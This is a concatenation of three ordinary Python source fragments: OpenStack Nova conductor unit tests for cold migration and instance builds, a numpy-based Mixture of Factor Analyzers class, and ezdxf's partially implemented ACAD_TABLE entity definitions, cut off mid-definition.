request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type=flavor).AndReturn(request_spec)
exc_info = exc.NoValidHost(reason="")
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
filter_props).AndRaise(exc_info)
updates = {'vm_state': vm_states.ACTIVE,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate,
self.context, inst_obj,
flavor, filter_props, [resvs])
def test_cold_migrate_no_valid_host_back_in_stopped_state(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type=flavor).AndReturn(request_spec)
exc_info = exc.NoValidHost(reason="")
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
filter_props).AndRaise(exc_info)
updates = {'vm_state': vm_states.STOPPED,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor, filter_props, [resvs])
def test_cold_migrate_no_valid_host_error_msg(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
with contextlib.nested(
mock.patch.object(compute_utils, 'get_image_metadata',
return_value=image),
mock.patch.object(scheduler_utils, 'build_request_spec',
return_value=request_spec),
mock.patch.object(self.conductor.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason=""))
) as (image_mock, brs_mock, select_dest_mock):
nvh = self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor, filter_props, [resvs])
self.assertIn('cold migrate', nvh.message)
def test_cold_migrate_exception_host_in_error_state_and_raise(self):
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
hosts = [dict(host='host1', nodename=None, limits={})]
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(self.conductor.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(scheduler_utils,
'populate_filter_properties')
self.mox.StubOutWithMock(self.conductor.compute_rpcapi,
'prep_resize')
self.mox.StubOutWithMock(self.conductor,
'_set_vm_state_and_notify')
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'fake-image_ref', mox.IsA(objects.Instance)).AndReturn(image)
scheduler_utils.build_request_spec(
self.context, image, [inst_obj],
instance_type='flavor').AndReturn(request_spec)
expected_filter_props = {'retry': {'num_attempts': 1,
'hosts': []},
'context': None}
self.conductor.scheduler_client.select_destinations(
self.context, request_spec,
expected_filter_props).AndReturn(hosts)
scheduler_utils.populate_filter_properties(filter_props,
hosts[0])
exc_info = test.TestingException('something happened')
expected_filter_props = {'retry': {'num_attempts': 1,
'hosts': []}}
self.conductor.compute_rpcapi.prep_resize(
self.context, image, inst_obj,
'flavor', hosts[0]['host'], [resvs],
request_spec=request_spec,
filter_properties=expected_filter_props,
node=hosts[0]['nodename']).AndRaise(exc_info)
updates = {'vm_state': vm_states.STOPPED,
'task_state': None}
self.conductor._set_vm_state_and_notify(self.context,
'migrate_server',
updates, exc_info,
request_spec)
# NOTE(mriedem): Validate that the quota rollback is using
# the correct project_id and user_id.
project_id, user_id = quotas_obj.ids_from_instance(self.context,
inst_obj)
quota.QUOTAS.rollback(self.context, [resvs], project_id=project_id,
user_id=user_id)
self.mox.ReplayAll()
self.assertRaises(test.TestingException,
self.conductor._cold_migrate,
self.context, inst_obj, 'flavor',
filter_props, [resvs])
def test_resize_no_valid_host_error_msg(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
flavor_new = flavors.get_flavor_by_name('m1.small')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
vm_state=vm_states.STOPPED,
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
request_spec = dict(instance_type=dict(extra_specs=dict()),
instance_properties=dict())
filter_props = dict(context=None)
resvs = 'fake-resvs'
image = 'fake-image'
with contextlib.nested(
mock.patch.object(compute_utils, 'get_image_metadata',
return_value=image),
mock.patch.object(scheduler_utils, 'build_request_spec',
return_value=request_spec),
mock.patch.object(self.conductor.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason=""))
) as (image_mock, brs_mock, select_dest_mock):
nvh = self.assertRaises(exc.NoValidHost,
self.conductor._cold_migrate, self.context,
inst_obj, flavor_new, filter_props,
[resvs])
self.assertIn('resize', nvh.message)
def test_build_instances_instance_not_found(self):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
self.mox.StubOutWithMock(instances[0], 'refresh')
self.mox.StubOutWithMock(instances[1], 'refresh')
image = {'fake-data': 'should_pass_silently'}
spec = {'fake': 'specs',
'instance_properties': instances[0]}
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(scheduler_driver, 'handle_schedule_error')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
scheduler_utils.build_request_spec(self.context, image,
mox.IgnoreArg()).AndReturn(spec)
self.conductor_manager.scheduler_client.select_destinations(
self.context, spec,
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(
[{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}])
instances[0].refresh().AndRaise(
exc.InstanceNotFound(instance_id=instances[0].uuid))
instances[1].refresh()
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context, instance=instances[1], host='host2',
image={'fake-data': 'should_pass_silently'}, request_spec=spec,
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2',
'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IsA(objects.BlockDeviceMappingList),
node='node2', limits=[])
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
@mock.patch.object(scheduler_utils, 'build_request_spec')
def test_build_instances_info_cache_not_found(self, build_request_spec):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
image = {'fake-data': 'should_pass_silently'}
destinations = [{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}]
spec = {'fake': 'specs',
'instance_properties': instances[0]}
build_request_spec.return_value = spec
with contextlib.nested(
mock.patch.object(instances[0], 'refresh',
side_effect=exc.InstanceInfoCacheNotFound(
instance_uuid=instances[0].uuid)),
mock.patch.object(instances[1], 'refresh'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations', return_value=destinations),
mock.patch.object(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
) as (inst1_refresh, inst2_refresh, select_destinations,
build_and_run_instance):
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
build_and_run_instance.assert_called_once_with(self.context,
instance=instances[1], host='host2', image={'fake-data':
'should_pass_silently'}, request_spec=spec,
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2',
'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mock.ANY,
node='node2', limits=[])
class ConductorTaskRPCAPITestCase(_BaseTaskTestCase,
test_compute.BaseTestCase):
"""Conductor compute_task RPC namespace Tests."""
def setUp(self):
super(ConductorTaskRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_rpcapi.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorTaskAPITestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""Compute task API Tests."""
def setUp(self):
super(ConductorTaskAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorLocalComputeTaskAPITestCase(ConductorTaskAPITestCase):
"""Conductor LocalComputeTaskAPI Tests."""
def setUp(self):
super(ConductorLocalComputeTaskAPITestCase, self).setUp()
self.conductor = conductor_api.LocalComputeTaskAPI()
self.conductor_manager = self.conductor._manager._target
|
|
__all__ = ["Mofa"]
import numpy as np
import matplotlib.pyplot as pl
from scipy.cluster.vq import kmeans
from scipy.linalg import inv
from matplotlib.patches import Ellipse
from . import _algorithms
class Mofa(object):
"""
Mixture of Factor Analyzers
calling arguments:
[ROSS DOCUMENT HERE]
internal variables:
`K`: Number of components
`M`: Latent dimensionality
`D`: Data dimensionality
`N`: Number of data points
`data`: (N,D) array of observations
`latents`: (K,M,N) array of latent variables
`latent_covs`: (K,M,M,N) array of latent covariances
`lambdas`: (K,M,D) array of loadings
`psis`: (K,D) array of diagonal variance values
`rs`: (K,N) array of responsibilities
`amps`: (K) array of component amplitudes
"""
def __init__(self,data,K,M,
PPCA=False,lock_psis=False,
rs_clip = 0.0,
max_condition_number=1.e6,
init=True,init_ppca=True):
# required
self.K = K
self.M = M
self.data = np.atleast_2d(data)
self.dataT = self.data.T # INSANE DATA DUPLICATION
self.N = self.data.shape[0]
self.D = self.data.shape[1]
# options
self.PPCA = PPCA
self.lock_psis = lock_psis
self.rs_clip = rs_clip
self.max_condition_number = float(max_condition_number)
assert rs_clip >= 0.0
# empty arrays to be filled
self.betas = np.zeros((self.K,self.M,self.D))
self.latents = np.zeros((self.K,self.M,self.N))
self.latent_covs = np.zeros((self.K,self.M,self.M,self.N))
self.kmeans_rs = np.zeros(self.N, dtype=int)
self.rs = np.zeros((self.K,self.N))
# initialize
if init:
self._initialize(init_ppca)
def _initialize(self,init_ppca,maxiter=200, tol=1e-4):
# Run K-means
# This is crazy, but DFM's kmeans returns nans/infs
# for some initializations
self.means = kmeans(self.data,self.K)[0]
self.run_kmeans()
# Randomly assign factor loadings
self.lambdas = np.random.randn(self.K,self.D,self.M) / \
np.sqrt(self.max_condition_number)
# Set (high rank) variance to variance of all data, along a dimension
self.psis = np.tile(np.var(self.data,axis=0)[None,:],(self.K,1))
# Set initial covs
self.covs = np.zeros((self.K,self.D,self.D))
self.inv_covs = 0. * self.covs
self._update_covs()
# Randomly assign the amplitudes.
self.amps = np.random.rand(self.K)
self.amps /= np.sum(self.amps)
if init_ppca:
# for each cluster, run a PPCA
for k in range(self.K):
ind = self.kmeans_rs==k
self.rs[k,ind] = 1
sumrs = np.sum(self.rs[k])
# run em
L = None
for i in xrange(maxiter):
self._one_component_E_step(k)
newL = self._log_sum(
self._log_multi_gauss(k,self.data[ind]))
newL = np.sum(newL)
self._one_component_M_step(k,sumrs,True)
self._update_covs()
if L!=None:
dL = np.abs((newL - L) / L)
if i > 5 and dL < tol:
break
L = newL
def run_kmeans(self, maxiter=200, tol=1e-4, verbose=True):
"""
Run the K-means algorithm using the C extension.
:param maxiter:
The maximum number of iterations to try.
:param tol:
The tolerance on the relative change in the loss function that
controls convergence.
:param verbose:
Print all the messages?
"""
iterations = _algorithms.kmeans(self.data, self.means,
self.kmeans_rs, tol, maxiter)
if verbose:
if iterations < maxiter:
print("K-means converged after {0} iterations."
.format(iterations))
else:
print("K-means *didn't* converge after {0} iterations."
.format(iterations))
def run_em(self, maxiter=400, tol=1e-4, verbose=True):
"""
Run the EM algorithm.
:param maxiter:
The maximum number of iterations to try.
:param tol:
The tolerance on the relative change in the loss function that
controls convergence.
:param verbose:
Print all the messages?
"""
L = None
for i in xrange(maxiter):
self._E_step()
newL = self.logLs.sum()
if i == 0 and verbose:
print("Initial NLL =", -newL)
self._M_step()
if L!=None:
dL = np.abs((newL - L) / L)
if i > 5 and dL < tol:
break
L = newL
if i < maxiter - 1:
if verbose:
print("EM converged after {0} iterations".format(i))
print("Final NLL = {0}".format(-newL))
else:
print("Warning: EM didn't converge after {0} iterations"
.format(i))
def take_EM_step(self):
"""
Do one E step and then do one M step. Duh!
"""
self._E_step()
self._M_step()
def _E_step(self):
"""
Expectation step. See docs for details.
"""
# resposibilities and likelihoods
self.logLs, self.rs = self._calc_probs()
for k in range(self.K):
self._one_component_E_step(k)
def _M_step(self):
"""
Maximization step. See docs for details.
This assumes that `_E_step()` has been run.
"""
sumrs = np.sum(self.rs,axis=1)
# maximize for each component
for k in range(self.K):
self._one_component_M_step(k,sumrs[k],self.PPCA)
self.amps[k] = sumrs[k] / self.N
if self.lock_psis:
psi = np.dot(sumrs, self.psis) / np.sum(sumrs)
for k in range(self.K):
self.psis[k] = psi
self._update_covs()
def _one_component_E_step(self,k):
"""
Calculate the E step for one component.
"""
# beta
self.betas[k] = np.dot(self.lambdas[k].T,self.inv_covs[k])
# latent values
zeroed = self.dataT - self.means[k, :, None]
self.latents[k] = np.dot(self.betas[k], zeroed)
# latent empirical covariance
step1 = self.latents[k, :, None, :] * self.latents[k, None, :, :]
step2 = np.dot(self.betas[k], self.lambdas[k])
self.latent_covs[k] = np.eye(self.M)[:,:,None] - step2[:,:,None] + step1
def _one_component_M_step(self,k,sumrs,PPCA):
"""
Calculate the M step for one component.
"""
# means
lambdalatents = np.dot(self.lambdas[k], self.latents[k])
self.means[k] = np.sum(self.rs[k] * (self.dataT - lambdalatents),
axis=1) / sumrs
# lambdas
zeroed = self.dataT - self.means[k,:, None]
self.lambdas[k] = np.dot(np.dot(zeroed[:,None,:] *
self.latents[k,None,:,:],self.rs[k]),
inv(np.dot(self.latent_covs[k],self.rs[k])))
# psis
# hacking a floor for psis
psis = np.dot((zeroed - lambdalatents) * zeroed,self.rs[k]) / sumrs
maxpsi = np.max(psis)
maxlam = np.max(np.sum(self.lambdas[k] * self.lambdas[k], axis=0))
minpsi = np.max([maxpsi, maxlam]) / self.max_condition_number
psis = np.clip(psis, minpsi, np.Inf)
if PPCA:
psis = np.mean(psis) * np.ones(self.D)
self.psis[k] = psis
def _update_covs(self):
"""
Update self.cov for responsibility, logL calc
"""
for k in range(self.K):
self.covs[k] = np.dot(self.lambdas[k],self.lambdas[k].T) + \
np.diag(self.psis[k])
self.inv_covs[k] = self._invert_cov(k)
def _calc_probs(self):
"""
Calculate log likelihoods, responsibilites for each datum
under each component.
"""
logrs = np.zeros((self.K, self.N))
for k in range(self.K):
logrs[k] = np.log(self.amps[k]) + self._log_multi_gauss(k, self.data)
# here lies some ghetto log-sum-exp...
# nothing like a little bit of overflow to make your day better!
L = self._log_sum(logrs)
logrs -= L[None, :]
if self.rs_clip > 0.0:
logrs = np.clip(logrs,np.log(self.rs_clip),np.Inf)
return L, np.exp(logrs)
def _log_multi_gauss(self, k, D):
"""
Gaussian log likelihood of the data for component k.
"""
sgn, logdet = np.linalg.slogdet(self.covs[k])
assert sgn > 0
X1 = (D - self.means[k]).T
X2 = np.dot(self.inv_covs[k], X1)
p = -0.5 * np.sum(X1 * X2, axis=0)
return -0.5 * np.log(2 * np.pi) * self.D - 0.5 * logdet + p
def _log_sum(self,loglikes):
"""
Calculate sum of log likelihoods
"""
loglikes = np.atleast_2d(loglikes)
a = np.max(loglikes, axis=0)
return a + np.log(np.sum(np.exp(loglikes - a[None, :]), axis=0))
def _invert_cov(self,k):
"""
Calculate inverse covariance of mofa or ppca model,
using inversion lemma
"""
psiI = inv(np.diag(self.psis[k]))
lam = self.lambdas[k]
lamT = lam.T
step = inv(np.eye(self.M) + np.dot(lamT,np.dot(psiI,lam)))
step = np.dot(step,np.dot(lamT,psiI))
step = np.dot(psiI,np.dot(lam,step))
return psiI - step
def plot_2d_ellipses(self,d1,d2, **kwargs):
"""
Make a 2D plot of the model projected onto axes
d1 and d2.
"""
for k in range(self.K):
mean = self.means[k,(d1, d2)]
cov = self.covs[k][((d1, d2),(d1, d2)), ((d1, d1), (d2, d2))]
self._plot_2d_ellipse(mean, cov, **kwargs)
def _plot_2d_ellipse(self, mu, cov, ax=None, **kwargs):
"""
Plot the error ellipse at a point given it's covariance matrix.
"""
# some sane defaults
facecolor = kwargs.pop('facecolor', 'none')
edgecolor = kwargs.pop('edgecolor', 'k')
x, y = mu
U, S, V = np.linalg.svd(cov)
theta = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
ellipsePlot = Ellipse(xy=[x, y],
width=2 * np.sqrt(S[0]),
height=2 * np.sqrt(S[1]),
angle=theta,
facecolor=facecolor, edgecolor=edgecolor, **kwargs)
if ax is None:
ax = pl.gca()
ax.add_patch(ellipsePlot)
|
|
# Copyright (c) 2019-2021 Manfred Moitzi
# License: MIT License
from typing import TYPE_CHECKING, Iterable, Optional
import copy
from ezdxf.math import Vec3, Matrix44
from ezdxf.lldxf.tags import Tags
from ezdxf.lldxf.attributes import (
DXFAttr,
DXFAttributes,
DefSubclass,
XType,
group_code_mapping,
)
from ezdxf.lldxf import const
from ezdxf.entities import factory
from .dxfentity import base_class, SubclassProcessor, DXFEntity, DXFTagStorage
from .dxfgfx import DXFGraphic, acdb_entity
from .dxfobj import DXFObject
from .objectcollection import ObjectCollection
if TYPE_CHECKING:
from ezdxf.eztypes import (
TagWriter,
DXFNamespace,
Drawing,
)
__all__ = ["AcadTable", "AcadTableBlockContent"]
@factory.register_entity
class AcadTableBlockContent(DXFTagStorage):
DXFTYPE = "ACAD_TABLE"
def proxy_graphic_content(self) -> Iterable[DXFGraphic]:
return super().__virtual_entities__()
def _block_content(self) -> Iterable[DXFGraphic]:
tags = self._block_reference_tags()
block_name: str = tags.get_first_value(2, "*")
return self.doc.blocks.get(block_name, []) # type: ignore
def _block_reference_tags(self) -> Tags:
try:
return self.xtags.get_subclass("AcDbBlockReference")
except const.DXFKeyError:
return Tags()
def _insert_location(self) -> Vec3:
return self._block_reference_tags().get_first_value(10, Vec3())
def __virtual_entities__(self) -> Iterable[DXFGraphic]:
"""Implements the SupportsVirtualEntities protocol."""
insert: Vec3 = Vec3(self._insert_location())
m: Optional[Matrix44] = None
if insert:
# TODO: OCS transformation (extrusion) is ignored yet
m = Matrix44.translate(insert.x, insert.y, insert.z)
for entity in self._block_content():
try:
clone = entity.copy()
except const.DXFTypeError:
continue
if m is not None:
# noinspection PyUnboundLocalVariable
try:
clone.transform(m)
except: # skip entity at any transformation issue
continue
yield clone
acdb_block_reference = DefSubclass(
"AcDbBlockReference",
{
# Block name: an anonymous block begins with a *T value
"geometry": DXFAttr(2),
# Insertion point:
"insert": DXFAttr(10, xtype=XType.point3d, default=Vec3(0, 0, 0)),
},
)
acdb_block_reference_group_codes = group_code_mapping(acdb_block_reference)
acdb_table = DefSubclass(
"AcDbTable",
{
# Table data version number: 0 = 2010
"version": DXFAttr(280),
# Hard of the TABLESTYLE object:
"table_style_id": DXFAttr(342),
# Handle of the associated anonymous BLOCK containing the graphical
# representation:
"block_record_handle": DXFAttr(343),
# Horizontal direction vector:
"horizontal_direction": DXFAttr(11),
# Flag for table value (unsigned integer):
"table_value": DXFAttr(90),
# Number of rows:
"n_rows": DXFAttr(91),
# Number of columns:
"n_cols": DXFAttr(92),
# Flag for an override:
"override_flag": DXFAttr(93),
# Flag for an override of border color:
"border_color_override_flag": DXFAttr(94),
# Flag for an override of border lineweight:
"border_lineweight_override_flag": DXFAttr(95),
# Flag for an override of border visibility:
"border_visibility_override_flag": DXFAttr(96),
# 141: Row height; this value is repeated, 1 value per row
# 142: Column height; this value is repeated, 1 value per column
# for every cell:
# 171: Cell type; this value is repeated, 1 value per cell:
# 1 = text type
# 2 = block type
# 172: Cell flag value; this value is repeated, 1 value per cell
# 173: Cell merged value; this value is repeated, 1 value per cell
# 174: Boolean flag indicating if the autofit option is set for the
# cell; this value is repeated, 1 value per cell
# 175: Cell border width (applicable only for merged cells); this
# value is repeated, 1 value per cell
# 176: Cell border height (applicable for merged cells); this value
# is repeated, 1 value per cell
# 91: Cell override flag; this value is repeated, 1 value per cell
# (from AutoCAD 2007)
# 178: Flag value for a virtual edge
# 145: Rotation value (real; applicable for a block-type cell and
# a text-type cell)
# 344: Hard pointer ID of the FIELD object. This applies only to a
# text-type cell. If the text in the cell contains one or more
# fields, only the ID of the FIELD object is saved.
# The text string (group codes 1 and 3) is ignored
# 1: Text string in a cell. If the string is shorter than 250
# characters, all characters appear in code 1.
# If the string is longer than 250 characters, it is divided
# into chunks of 250 characters.
# The chunks are contained in one or more code 2 codes.
# If code 2 codes are used, the last group is a code 1 and is
# shorter than 250 characters.
# This value applies only to text-type cells and is repeated,
# 1 value per cell
# 2: Text string in a cell, in 250-character chunks; optional.
# This value applies only to text-type cells and is repeated,
# 1 value per cell
# 340: Hard-pointer ID of the block table record.
# This value applies only to block-type cells and is repeated,
# 1 value per cell
# 144: Block scale (real). This value applies only to block-type
# cells and is repeated, 1 value per cell
# 176: Number of attribute definitions in the block table record
# (applicable only to a block-type cell)
# for every ATTDEF:
# 331: Soft pointer ID of the attribute definition in the
# block table record, referenced by group code 179
# (applicable only for a block-type cell). This value is
# repeated once per attribute definition
# 300: Text string value for an attribute definition, repeated
# once per attribute definition and applicable only for
# a block-type cell
# 7: Text style name (string); override applied at the cell level
# 140: Text height value; override applied at the cell level
# 170: Cell alignment value; override applied at the cell level
# 64: Value for the color of cell content; override applied at the
# cell level
# 63: Value for the background (fill) color of cell content;
# override applied at the cell level
# 69: True color value for the top border of the cell;
# override applied at the cell level
# 65: True color value for the right border of the cell;
# override applied at the cell level
# 66: True color value for the bottom border of the cell;
# override applied at the cell level
# 68: True color value for the left border of the cell;
# override applied at the cell level
# 279: Lineweight for the top border of the cell;
# override applied at the cell level
# 275: Lineweight for the right border of the cell;
# override applied at the cell level
# 276: Lineweight for the bottom border of the cell;
# override applied at the cell level
# 278: Lineweight for the left border of the cell;
# override applied at the cell level
# 283: Boolean flag for whether the fill color is on;
# override applied at the cell level
# 289: Boolean flag for the visibility of the top border of the cell;
# override applied at the cell level
# 285: Boolean flag for the visibility of the right border of the cell;
# override applied at the cell level
# 286: Boolean flag for the visibility of the bottom border of the cell;
# override applied at the cell level
# 288: Boolean flag for the visibility of the left border of the cell;
# override applied at the cell level
# 70: Flow direction;
# override applied at the table entity level
# 40: Horizontal cell margin;
# override applied at the table entity level
# 41: Vertical cell margin;
# override applied at the table entity level
# 280: Flag for whether the title is suppressed;
# override applied at the table entity level
# 281: Flag for whether the header row is suppressed;
# override applied at the table entity level
# 7: Text style name (string);
# override applied at the table entity level.
# There may be one entry for each cell type
# 140: Text height (real);
# override applied at the table entity level.
# There may be one entry for each cell type
# 170: Cell alignment (integer);
# override applied at the table entity level.
# There may be one entry for each cell type
# 63: Color value for cell background or for the vertical, left
# border of the table; override applied at the table entity
# level. There may be one entry for each cell type
# 64: Color value for cell content or for the horizontal, top
# border of the table; override applied at the table entity
# level. There may be one entry for each cell type
# 65: Color value for the horizontal, inside border lines;
# override applied at the table entity level
# 66: Color value for the horizontal, bottom border lines;
# override applied at the table entity level
# 68: Color value for the vertical, inside border lines;
# override applied at the table entity level
# 69: Color value for the vertical, right border lines;
# override applied at the table entity level
# 283: Flag for whether background color is enabled (default = 0);
# override applied at the table entity level.
# There may be one entry for each cell type: 0/1 = Disabled/Enabled
# 274-279: Lineweight for each border type of the cell (default = kLnWtByBlock);
# override applied at the table entity level.
# There may be one group for each cell type
# 284-289: Flag for visibility of each border type of the cell (default = 1);
# override applied at the table entity level.
# There may be one group for each cell type: 0/1 = Invisible/Visible
# 97: Standard/title/header row data type
# 98: Standard/title/header row unit type
# 4: Standard/title/header row format string
#
# AutoCAD 2007 and before:
# 177: Cell override flag value (before AutoCAD 2007)
# 92: Extended cell flags (from AutoCAD 2007), COLLISION: group code
# also used by n_cols
# 301: Text string in a cell. If the string is shorter than 250
# characters, all characters appear in code 302.
# If the string is longer than 250 characters, it is divided into
# chunks of 250 characters.
# The chunks are contained in one or more code 303 codes.
# If code 393 codes are used, the last group is a code 1 and is
# shorter than 250 characters.
# This value applies only to text-type cells and is repeated,
# 1 value per cell (from AutoCAD 2007)
# 302: Text string in a cell, in 250-character chunks; optional.
# This value applies only to text-type cells and is repeated,
# 302 value per cell (from AutoCAD 2007)
#
# REMARK from Autodesk:
# Group code 178 is a flag value for a virtual edge. A virtual edge is
# used when a grid line is shared by two cells.
# For example, if a table contains one row and two columns and it
# contains cell A and cell B, the central grid line
# contains the right edge of cell A and the left edge of cell B.
# One edge is real, and the other edge is virtual.
# The virtual edge points to the real edge; both edges have the same
# set of properties, including color, lineweight, and visibility.
},
)
acdb_table_group_codes = group_code_mapping(acdb_table)
# todo: implement ACAD_TABLE
class AcadTable(DXFGraphic):
"""DXF ACAD_TABLE entity"""
DXFTYPE = "ACAD_TABLE"
DXFATTRIBS = DXFAttributes(
base_class, acdb_entity, acdb_block_reference, acdb_table
)
MIN_DXF_VERSION_FOR_EXPORT = const.DXF2007
def __init__(self):
super().__init__()
self.data = None
def _copy_data(self, entity: "DXFEntity") -> None:
"""Copy data."""
assert isinstance(entity, AcadTable)
entity.data = copy.deepcopy(self.data)
def load_dxf_attribs(
self, processor: SubclassProcessor = None
) -> "DXFNamespace":
dxf = super().load_dxf_attribs(processor)
if processor:
processor.fast_load_dxfattribs(
dxf, acdb_block_reference_group_codes, subclass=2
)
tags = processor.fast_load_dxfattribs(
dxf, acdb_table_group_codes, subclass=3, log=False
)
self.load_table(tags)
return dxf
def load_table(self, tags: "Tags"):
pass
def export_entity(self, tagwriter: "TagWriter") -> None:
"""Export entity specific data as DXF tags."""
super().export_entity(tagwriter)
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_block_reference.name)
self.dxf.export_dxf_attribs(tagwriter, ["geometry", "insert"])
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_table.name)
self.export_table(tagwriter)
def export_table(self, tagwriter: "TagWriter"):
pass
def __referenced_blocks__(self) -> Iterable[str]:
"""Support for "ReferencedBlocks" protocol."""
if self.doc:
block_record_handle = self.dxf.get("block_record_handle", None)
if block_record_handle:
return (block_record_handle,)
return tuple()
acdb_table_style = DefSubclass(
"AcDbTableStyle",
{
# Table style version: 0 = 2010
"version": DXFAttr(280),
# Table style description (string; 255 characters maximum):
"name": DXFAttr(3),
# FlowDirection (integer):
# 0 = Down
# 1 = Up
"flow_direction": DXFAttr(7),
# Flags (bit-coded)
"flags": DXFAttr(7),
# Horizontal cell margin (real; default = 0.06)
"horizontal_cell_margin": DXFAttr(40),
# Vertical cell margin (real; default = 0.06)
"vertical_cell_margin": DXFAttr(41),
# Flag for whether the title is suppressed:
# 0/1 = not suppressed/suppressed
"suppress_title": DXFAttr(280),
# Flag for whether the column heading is suppressed:
